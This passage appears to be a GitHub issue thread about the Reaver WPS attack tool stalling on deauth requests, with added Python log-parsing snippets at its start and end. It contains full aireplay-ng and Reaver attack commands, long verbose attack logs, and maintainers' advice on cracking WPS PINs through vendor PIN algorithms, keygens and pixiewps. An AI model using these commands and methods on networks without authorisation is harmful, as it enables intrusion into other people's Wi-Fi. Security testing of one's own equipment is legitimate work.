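[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
"""

if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_LOG)))
```

Run it against a real capture with `reaver ... -vvv 2>&1 | tee reaver.log` and feed the file to `summarize()`. Resends are only counted once a deauth has been seen in that attempt, so a healthy attempt with the usual one or two retries is not flagged; an attempt that never receives M1 but keeps resending after a deauth is exactly the stall this issue describes.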

soxrok2212 commented 1 year ago

Try with the -N flag

rofl0r commented 1 year ago

We haven't yet decided how to handle deauth requests. I guess in bruteforce mode it would be best to send deauth, and start over (including auth, assoc) with the current pin.

mkarne1 commented 1 year ago

Try with the -N flag

@soxrok2212 I just tried it, but unfortunately I get the same result. You can find the output below. Nevertheless, thanks for your help!


──(root㉿kali)-[~]
└─# aireplay-ng --fakeauth 100 -a D4:3D:F3:XX:XX:XX -h 06:AE:XX:XX:XX:XX wlan0
17:47:52  Waiting for beacon frame (BSSID: D4:3D:F3:XX:XX:XX) on channel 5

17:47:52  Sending Authentication Request (Open System)

17:47:54  Sending Authentication Request (Open System) [ACK]
17:47:54  Authentication successful
17:47:54  Sending Association Request [ACK]
17:47:55  Association successful :-) (AID: 1)

17:48:01  Got a deauthentication packet! (Waiting 3 seconds)

17:48:04  Sending Authentication Request (Open System) [ACK]
17:48:04  Got a deauthentication packet! (Waiting 5 seconds)

17:48:09  Sending Authentication Request (Open System) [ACK]
17:48:09  Got a deauthentication packet! (Waiting 7 seconds)

17:48:16  Sending Authentication Request (Open System) [ACK]
17:48:17  Got a deauthentication packet! (Waiting 9 seconds)

17:48:26  Sending Authentication Request (Open System) [ACK]
17:48:26  Got a deauthentication packet! (Waiting 11 seconds)

──(root㉿kali)-[~]
└─# reaver --bssid D4:3D:F3:XX:XX:XX --channel 5 --interface wlan0 -vvv --no-associate -N

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0 to channel 5
[?] Restore previous session for D4:3D:F3:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from D4:3D:F3:XX:XX:XX
[+] Received beacon from D4:3D:F3:XX:XX:XX
[+] Vendor: RalinkTe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 d4 3d f3 74 f3 92
WPS: Enrollee MAC Address D4:3D:F3:XX:XX:XX
WPS: Enrollee Nonce - hexdump(len=16): 2c 44 dc 84 32 e0 89 99 5f 84 b4 21 fb c8 4c ca
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
     5a 59 58 45 4c                                    ZYXEL           
WPS: Model Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               VMG3625-T50B    
WPS: Model Number - hexdump_ascii(len=6):
     52 54 32 38 36 30                                 RT2860          
WPS: Serial Number - hexdump_ascii(len=4):
     31 32 33 34                                       1234            
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               VMG3625-T50B    
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 45 13 05 2a 54 d8 54 a1 40 80 3f b3 be f1 50 ca
WPS: UUID-R - hexdump(len=16): a3 e5 5e 11 b1 68 46 81 a7 47 24 10 68 3b 5f ff
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): fe 7c f6 54 86 65 60 b7 d1 51 77 3c f5 d3 bf cd ef b6 03 bd 95 40 c8 bc 7a c0 eb da 67 7d 9a ad f4 cb 99 fc 9a 8e 78 15 d1 3b f5 e3 55 d6 af d5 3e 5f 35 52 4f 14 38 63 40 3d a2 45 3e 9c 7b fe 2e 3e fd 80 d3 84 91 98 46 88 75 64 96 23 ab ef 52 33 bb 63 0e 84 88 8b f8 44 1d ab a9 9f 36 4a 30 69 74 1c a1 c5 0e e2 fa 8d 97 07 6f 8c f6 7c ef 83 6f f0 69 a5 92 41 58 a7 70 f3 2f 42 1d 83 02 f0 f9 79 71 7b 6b 64 40 9f c1 f3 1b 10 4f 8b 2e 45 ed e5 f9 24 1c a9 cd eb c6 d9 6f af fc 94 b9 56 b3 37 9c 1e 9e ed 1b f9 19 77 65 25 6d 72 70 42 3e c1 69 aa 6b 37 77 ee 9b 61 bc ec 1e c0
DH: public value - hexdump(len=192): f0 eb b1 c5 14 d5 ae 77 c7 fa 37 b0 0b 2b 83 72 1c ac 8d 9b 45 b7 47 f4 cd 36 76 cc 2c 88 31 87 6b 47 22 8e 62 dd 53 10 d9 bd 7a eb 13 c4 6b bc 56 19 d1 be e0 af 0e 93 16 2b da 01 94 52 8e ce dc 73 8b 23 ed 51 93 36 5b ef 03 87 fa 68 c7 61 50 f6 f4 7b b0 73 b0 ac bf 0a 26 0e dd 18 f5 78 1f 2f 96 1f 11 6d ce d2 1c 34 79 97 ce 2e a4 03 2e b2 d1 e5 fa 5b 5e 58 57 f3 52 c3 eb 2e a8 11 c4 f0 fb 28 e6 4c fc 2c 45 11 ce 99 a9 16 e6 d2 15 56 50 3a 89 c5 39 29 ad a6 d7 4c b1 ea ad 53 72 5d e7 07 78 61 70 1f 52 69 b9 ea a4 17 09 a3 f2 c0 fa 8c 73 4c 49 cd ee 85 43 20 93 64 0f 3c
WPS: DH Private Key - hexdump(len=192): fe 7c f6 54 86 65 60 b7 d1 51 77 3c f5 d3 bf cd ef b6 03 bd 95 40 c8 bc 7a c0 eb da 67 7d 9a ad f4 cb 99 fc 9a 8e 78 15 d1 3b f5 e3 55 d6 af d5 3e 5f 35 52 4f 14 38 63 40 3d a2 45 3e 9c 7b fe 2e 3e fd 80 d3 84 91 98 46 88 75 64 96 23 ab ef 52 33 bb 63 0e 84 88 8b f8 44 1d ab a9 9f 36 4a 30 69 74 1c a1 c5 0e e2 fa 8d 97 07 6f 8c f6 7c ef 83 6f f0 69 a5 92 41 58 a7 70 f3 2f 42 1d 83 02 f0 f9 79 71 7b 6b 64 40 9f c1 f3 1b 10 4f 8b 2e 45 ed e5 f9 24 1c a9 cd eb c6 d9 6f af fc 94 b9 56 b3 37 9c 1e 9e ed 1b f9 19 77 65 25 6d 72 70 42 3e c1 69 aa 6b 37 77 ee 9b 61 bc ec 1e c0
WPS: DH own Public Key - hexdump(len=192): f0 eb b1 c5 14 d5 ae 77 c7 fa 37 b0 0b 2b 83 72 1c ac 8d 9b 45 b7 47 f4 cd 36 76 cc 2c 88 31 87 6b 47 22 8e 62 dd 53 10 d9 bd 7a eb 13 c4 6b bc 56 19 d1 be e0 af 0e 93 16 2b da 01 94 52 8e ce dc 73 8b 23 ed 51 93 36 5b ef 03 87 fa 68 c7 61 50 f6 f4 7b b0 73 b0 ac bf 0a 26 0e dd 18 f5 78 1f 2f 96 1f 11 6d ce d2 1c 34 79 97 ce 2e a4 03 2e b2 d1 e5 fa 5b 5e 58 57 f3 52 c3 eb 2e a8 11 c4 f0 fb 28 e6 4c fc 2c 45 11 ce 99 a9 16 e6 d2 15 56 50 3a 89 c5 39 29 ad a6 d7 4c b1 ea ad 53 72 5d e7 07 78 61 70 1f 52 69 b9 ea a4 17 09 a3 f2 c0 fa 8c 73 4c 49 cd ee 85 43 20 93 64 0f 3c
WPS: DH Private Key - hexdump(len=192): fe 7c f6 54 86 65 60 b7 d1 51 77 3c f5 d3 bf cd ef b6 03 bd 95 40 c8 bc 7a c0 eb da 67 7d 9a ad f4 cb 99 fc 9a 8e 78 15 d1 3b f5 e3 55 d6 af d5 3e 5f 35 52 4f 14 38 63 40 3d a2 45 3e 9c 7b fe 2e 3e fd 80 d3 84 91 98 46 88 75 64 96 23 ab ef 52 33 bb 63 0e 84 88 8b f8 44 1d ab a9 9f 36 4a 30 69 74 1c a1 c5 0e e2 fa 8d 97 07 6f 8c f6 7c ef 83 6f f0 69 a5 92 41 58 a7 70 f3 2f 42 1d 83 02 f0 f9 79 71 7b 6b 64 40 9f c1 f3 1b 10 4f 8b 2e 45 ed e5 f9 24 1c a9 cd eb c6 d9 6f af fc 94 b9 56 b3 37 9c 1e 9e ed 1b f9 19 77 65 25 6d 72 70 42 3e c1 69 aa 6b 37 77 ee 9b 61 bc ec 1e c0
WPS: DH peer Public Key - hexdump(len=192): 38 90 64 96 c1 49 c6 65 74 0e 65 40 85 41 41 8c 29 26 73 c1 a9 f8 5f 32 46 27 3c e5 b6 98 21 1a 34 cb 4b e8 28 b0 fd 2e 3a 58 6d 18 37 58 d4 a4 dd d6 1d ac f2 8c df 60 11 f2 73 c5 4f 8d 4e fd 7e 4a 07 86 38 7d b6 0a cb 12 e1 ab cb 2d fa 3d 83 4f 3a 95 da 3a 04 32 d4 7e 59 29 90 cc 12 85 7b 88 14 f5 9c 91 92 0f 67 26 c0 88 ba cb 9a b7 09 6e 5f 86 40 bb f6 59 3a c1 bf db 6f df 2a c3 b3 d9 38 4e 66 6e 9c 5e 72 33 8f 8c 71 9d f9 85 36 e8 8a 06 79 14 cb 0d 26 77 81 fb 2b df ae c8 4d e5 a9 87 b8 48 5d 46 d3 73 6a 86 fb 24 1c 60 b7 bc 97 0e c5 d6 7a c4 5b cf b8 12 90 74 04 17
DH: shared key - hexdump(len=192): 31 1e ce d1 27 72 f7 22 68 05 7b 78 17 3b de 4d b8 29 57 ce 04 a1 c5 47 40 2f 36 c8 56 14 0e 40 3d 99 ff 10 55 75 49 4e c3 84 65 b5 87 8c 01 e1 61 a9 b7 fc 78 9f b2 bf 38 72 90 5a 5a 0e 35 c5 f7 d9 55 f0 79 68 1c 88 50 01 a5 07 b7 0a 88 96 96 b9 6f 95 49 87 c7 e7 e6 08 29 10 75 53 f4 8c aa 3d b6 de 42 a9 36 a3 77 53 37 08 3c db ba f0 0d ac 85 42 29 6a 31 aa 05 0f 18 a9 62 56 63 b3 44 52 7b d8 c9 ea 28 d8 c5 58 18 22 32 2b f3 96 2b cc 0f a7 a6 e8 9e ef 08 87 97 26 fd 7c f6 63 9e cb b8 37 8c bb 50 e3 00 ea 46 33 35 3d 1c 53 9e 0f 59 36 c8 eb d5 0e 89 5f 9b dc 66 3b 8e 77
WPS: DH shared key - hexdump(len=192): 31 1e ce d1 27 72 f7 22 68 05 7b 78 17 3b de 4d b8 29 57 ce 04 a1 c5 47 40 2f 36 c8 56 14 0e 40 3d 99 ff 10 55 75 49 4e c3 84 65 b5 87 8c 01 e1 61 a9 b7 fc 78 9f b2 bf 38 72 90 5a 5a 0e 35 c5 f7 d9 55 f0 79 68 1c 88 50 01 a5 07 b7 0a 88 96 96 b9 6f 95 49 87 c7 e7 e6 08 29 10 75 53 f4 8c aa 3d b6 de 42 a9 36 a3 77 53 37 08 3c db ba f0 0d ac 85 42 29 6a 31 aa 05 0f 18 a9 62 56 63 b3 44 52 7b d8 c9 ea 28 d8 c5 58 18 22 32 2b f3 96 2b cc 0f a7 a6 e8 9e ef 08 87 97 26 fd 7c f6 63 9e cb b8 37 8c bb 50 e3 00 ea 46 33 35 3d 1c 53 9e 0f 59 36 c8 eb d5 0e 89 5f 9b dc 66 3b 8e 77
WPS: DHKey - hexdump(len=32): 34 1c 70 bf 6a 8f 84 fc 00 15 9f e6 69 98 83 5a 30 e5 2d 8a 13 3a 54 26 a2 82 8f eb a1 d6 ae 1d
WPS: KDK - hexdump(len=32): 43 e0 0c 10 08 70 b1 2e 63 82 74 57 39 7b eb ac 35 dd 30 46 41 b5 b9 02 16 c3 ca 4b 37 2a 8d 99
WPS: AuthKey - hexdump(len=32): 7e 4c 2b 4b 5f 4a 16 0e 38 1d 6b 05 c7 df c1 7c 36 44 0d 4a 0d 66 f4 77 07 8a 84 67 27 e9 b9 ba
WPS: KeyWrapKey - hexdump(len=16): 30 b9 7c 16 2c 73 9e c2 53 9f ac 09 2d 7a 91 e9
WPS: EMSK - hexdump(len=32): 30 ef 8d 2d b8 14 1e 2d d9 58 86 95 a4 9c 67 81 84 fb 4a e4 5a 75 00 9b 6d 09 1f 71 5f 07 52 4d
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 05 1b 1b 0a d2 7a 95 d3 84 c5 44 47 d0 0b 06 06 32 28 88 87 8e e8 6d ca e1 35 00 9d 82 f5 14 6c
WPS: E-Hash2 - hexdump(len=32): 6a 6b d2 0d b8 46 18 e8 92 9a 0f e3 3d fc df 6a 93 05 32 e6 bc 39 df dc cd 96 ab 04 f0 8a 09 f5
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M3 message
WPS: Building Message M4
WPS: Dev Password Len: 8
WPS: Dev Password: 12345670�5�T
WPS: Device Password - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: PSK1 - hexdump(len=16): 47 f1 8d a1 5a 70 d6 50 c9 09 a2 8a 98 eb 1f 2d
WPS: PSK2 - hexdump(len=16): f0 1b 96 a0 7f 78 00 bd 3e 86 82 8c 51 ac 18 41
Allocs OK, building M4 packet
WPS:  * Version
WPS:  * Message Type (8)
WPS:  * Enrollee Nonce
WPS: R-S1 - hexdump(len=16): 61 3f 21 17 8c db be f2 40 35 dc ef a5 c8 90 4b
WPS: R-S2 - hexdump(len=16): a3 56 b4 13 d5 e8 a2 de 00 a4 f0 29 ba 6c 1a 00
WPS:  * R-Hash1
WPS: R-Hash1 - hexdump(len=32): fb 03 a6 e3 ab 12 57 20 8d 91 b8 11 52 8b 6a 3e 46 cd 20 c8 34 3a 67 ac 45 63 45 57 b3 04 0c a8
WPS:  * R-Hash2
WPS: R-Hash2 - hexdump(len=32): 34 74 ca 3a 72 d7 d7 ab 79 07 b6 5f bf d7 c9 c4 7a 97 30 a3 dc 4a 77 f2 63 c9 5a 50 f3 da 16 5a
WPS:  * R-SNonce1
WPS:  * Key Wrap Authenticator
WPS:  * Encrypted Settings
WPS:  * Authenticator
[+] Sending M4 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 18
[+] Received WSC NACK
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 d4 3d f3 74 f3 92
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     30 30 30 30 35 36 37 38                           00005678        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "00005678"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
^Csend_packet called from send_termination() send.c:142

[+] Session saved.
mkarne1 commented 1 year ago

> we haven't yet decided how to handle deauth requests. i guess in bruteforce mode it would be best to send deauth, and start over (including auth, assoc) with the current pin.

@rofl0r thanks for the quick reply!

I'm not sure if I fully understand your reply. Is there currently a way to solve this issue? Or is this a known issue that has no fix yet?

rofl0r commented 1 year ago

> I'm not sure if I fully understand your reply. Is there currently a way to solve this issue? Or is this a known issue that has no fix yet?

it's a TODO item, so it needs someone to implement handling of deauth requests in bruteforce mode. the only contributor i'm aware of that still uses bruteforce mode in the age of WPS 2.0 is @feitoi. maybe he can be bothered to implement it.

mkarne1 commented 1 year ago

@rofl0r Okay, got it, then I think we can close this issue. Just one last question: Is there any other / better / recommended way of cracking WPS networks?

rofl0r commented 1 year ago

the bruteforce method is almost useless these days, the preferred method is to identify the algorithm used by the vendor to generate the wps pin (often from mac address), calculate the right pin in advance and use reaver or oneshot to send that single pin. 3wifi has a website with an online keygen for many router models. that or pixiewps, if the router is vulnerable.

mkarne1 commented 1 year ago

@rofl0r Thanks a lot, I really appreciate your help!

soxrok2212 commented 1 year ago

Thank you @mkarne1 for being patient and polite. It's hard to come by these days. In the meantime, you could try the tool "bully", but I'm unsure of the state of that one too.

mkarne1 commented 1 year ago

@soxrok2212 nothing to thank me for, you guys are providing all of us with a great, free tool and provide great, free support on top. The least I can be is friendly! :)

feitoi commented 1 year ago

I've analyzed a lot of deauth requests, there's nothing to do. If you want to improve the performance of the brute force mode a little more, decrease some definitions like EAPOL_START_MAX_TRIES, MAX_ASSOC_FAILURES and WARN_FAILURE_COUNT to 5 or less.

I did a test with a router that does not have WPS LOCK. With external association, the performance dropped to 53 seconds/PIN (with EAPOL_START_MAX_TRIES set to 5), while without external association it stays at 7 seconds/PIN. With external association, every PIN attempt runs into a problem with EAPOL START:

root@kali:~# reaver -b 74:EA:3A:XX:XX:XX -c 4 -i wlan1mon -vvNA

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan1mon to channel 4
[?] Restore previous session for 74:EA:3A:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from 74:EA:3A:XX:XX:XX
[+] Received beacon from 74:EA:3A:XX:XX:XX
[+] Vendor: AtherosC
[+] Trying pin "12345670"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK (reason: 0x0000)
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 5 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "00005678"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK (reason: 0x0000)
[+] Sending WSC NACK
[+] Trying pin "01235678"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 5 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "01235678"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK (reason: 0x0000)
[+] Sending WSC NACK
[+] Trying pin "11115670"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
...
mkarne1 commented 1 year ago

> the bruteforce method is almost useless these days, the preferred method is to identify the algorithm used by the vendor to generate the wps pin (often from mac address), calculate the right pin in advance and use reaver or oneshot to send that single pin. 3wifi has a website with an online keygen for many router models. that or pixiewps, if the router is vulnerable.

@rofl0r sorry to bother you again, but do you happen to have an invite code? The WPS PIN generator is only accessible for members and registration is limited to those who have a code.

According to this post I can buy it from binarymaster, but he hasn't been online for a few months and I'm not sure if/when he will read my message.

Thanks for your time & best regards.

rofl0r commented 1 year ago

@feitoi

> [+] Received deauth request

the problem is with routers that send a deauth request during a WPS tx. reaver currently doesn't handle it at all, which makes bruteforce mode get stuck.

@mkarne1 the wpspin site has 2 forms, the right one (database search) is only for members, the left one is available for everyone. it uses javascript to generate pins with the selected method from the mac address you enter. i don't have an invitation code for the site.
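The two failure modes discussed in this thread look different in reaver's own output: the attempt that reaches M4 and gets a WSC NACK, the attempt that burns through `EAPOL_START_MAX_TRIES` start requests and is re-queued (feitoi's external-association log), and the attempt that receives a deauth and then only ever logs `resend_last_packet()` until the receive timeout (mkarne1's log, the stuck state rofl0r describes). The following is an added example, not code from reaver or from anyone in this thread, that groups reaver's verbose output into per-PIN attempts and classifies each one so the cost of the retries and the stuck loop can be read off a session log. The sample logs are constructed, abridged from the output posted in this thread, and the outcome labels are my own.

```python
"""Group reaver verbose output into per-PIN attempts and classify each one.

Added example, not part of reaver or of this issue thread. The sample logs
below are constructed, abridged from the output posted in the thread.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

PIN_RE = re.compile(r'^\[\+\] Trying pin "(\d{8})"')


@dataclass
class Attempt:
    pin: str
    lines: list = field(default_factory=list)

    def count(self, needle: str) -> int:
        return sum(1 for line in self.lines if needle in line)

    def outcome(self) -> str:
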